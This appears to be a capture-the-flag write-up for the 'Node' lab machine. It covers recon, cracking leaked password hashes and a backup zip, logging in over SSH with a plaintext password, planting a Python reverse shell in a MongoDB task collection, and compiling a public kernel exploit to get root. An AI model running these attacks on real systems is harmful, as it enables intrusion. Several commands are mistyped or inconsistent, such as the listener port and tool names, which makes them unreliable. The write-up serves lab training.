NODE
Lets start with Nmap scan
nmap -sV -sC -O -T4 -o result.txt 10.129.31.121 -Pn
Port 3000 is open there is a welcome page and login panel.
When we examine the source code of the login page and go to every endpoint we realize that there are some user credentials at the specific endpoint.
- /login
- /login has /assets/js/app/contollers/home.js
- /assets/js/app/contollers/home.js has /api/users/latest
- /api/users/latest has user credentials like username and password hashes.
When we go up in the directory we find other user information comes up. /api/users
Let's crack password hashes, starting with the admin user, firstly we need to learn the type of hash, I used https://crackstation.net and this is a sha256 hash.
Let's verify the hash of manchester with Kali. After that, I am looking /admin directory and there is a backup file.
echo -n "manchester" | sha256s
But it is asking password, lets crack.
frackzip -u -D -p /usr/share/wordlists/rockyou.txt myplace-decoded.backup 
We found the password and there are some MongoDB credentials in these files.
I noted these credentials and made connection.
ssh mark@10.129.31.121
password 5AYRft73VtFpc84k
The task collection has no documents. Let’s add one that establishes a reverse shell connection to our attack machine.
# insert document that contains a reverse shell
db.tasks.insert({cmd: "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.77\",77));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"})# double check that the document got added properly.
db.tasks.find()
---
nc -nlvp 8888
There are many privilege escalation methods for this box but most of them are so complex, that is why I found an easy way.
This machine running Ubuntu 4.4.o and has local privilege escalation vulnerability. Let's get this c code, send it to the target machine, and compile it over there.
gcc 44298.c -o shell
chmod +x shell
./shelland we became root.
